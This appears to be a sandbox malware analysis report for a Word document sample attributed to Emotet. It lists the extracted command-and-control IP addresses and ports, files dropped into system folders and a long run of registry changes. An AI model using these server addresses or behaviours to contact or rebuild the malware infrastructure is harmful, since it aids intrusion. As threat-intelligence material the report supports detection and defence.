012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

Analysis

max time kernel
149s
max time network
156s
resource
win7

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_129a4380ebaff7cfc82bfe05e7d282ff.html
Sample

191017-bvrhgps4xs
SHA256

012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

Score

N/A

Malware Config

Extracted

Family

emotet

186.90.29.228:443

181.135.153.203:443

74.208.68.48:8080

104.131.58.132:8080

68.183.190.199:8080

50.28.51.143:8080

77.55.211.77:8080

181.29.101.13:8080

178.79.163.131:8080

5.1.86.195:8080

187.188.166.192:80

203.25.159.3:8080

139.5.237.27:443

190.1.37.125:443

200.58.171.51:80

186.1.41.111:443

46.29.183.211:8080

109.169.86.13:8080

71.244.60.231:7080

159.203.204.126:8080

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 5 IoCs

at	description	ioc	Process
4057	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
4072	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
4072	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
4712	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc	WINWORD.EXE
5149	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc	WINWORD.EXE

Drops file in system dir 17 IoCs

at	description	ioc	Process
5383	File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
5383	File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
9329	File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
9376	File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE
32807	File renamed	C:\Users\Admin\506.exe => C:\Windows\SysWOW64\loadarouter.exe	506.exe
50514	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	loadarouter.exe
148810	File created (read-only)	C:\Windows\TEMP\B49E.tmp	loadarouter.exe
148810	File created (read-only)	C:\Windows\TEMP\B4AF.tmp	loadarouter.exe
148810	File deleted	C:\Windows\Temp\B49E.tmp	loadarouter.exe
148810	File deleted	C:\Windows\Temp\B4AF.tmp	loadarouter.exe
148810	File created (read-only)	C:\Windows\TEMP\B4B0.tmp	loadarouter.exe
148810	File deleted	C:\Windows\Temp\B4B0.tmp	loadarouter.exe
148825	File created	C:\Windows\SysWOW64\loadaroutera.exe	loadarouter.exe
148825	File opened for modification	C:\Windows\SysWOW64\loadaroutera.exe	loadarouter.exe
148825	File created	C:\Windows\SysWOW64\loadarouterb.exe	loadarouter.exe
148841	File deleted	C:\Windows\SysWOW64\loadarouterb.exe	loadarouter.exe
148841	File deleted	C:\Windows\SysWOW64\loadaroutera.exe	loadarouter.exe

Modifies registry class 1 TTPs 280 IoCs

persistence

Modify Registry

T1112

at	description	ioc	Process
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}	WINWORD.EXE
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0	WINWORD.EXE
7645	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\FLAGS	WINWORD.EXE
7645	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\FLAGS\ = "6"	WINWORD.EXE
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0	WINWORD.EXE
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0\win32	WINWORD.EXE
7645	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
7645	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\HELPDIR	WINWORD.EXE
7645	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\FLAGS	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\FLAGS\ = "6"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0\win32	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\HELPDIR	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{09C6529D-0350-48A7-B081-A954E2D48267}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
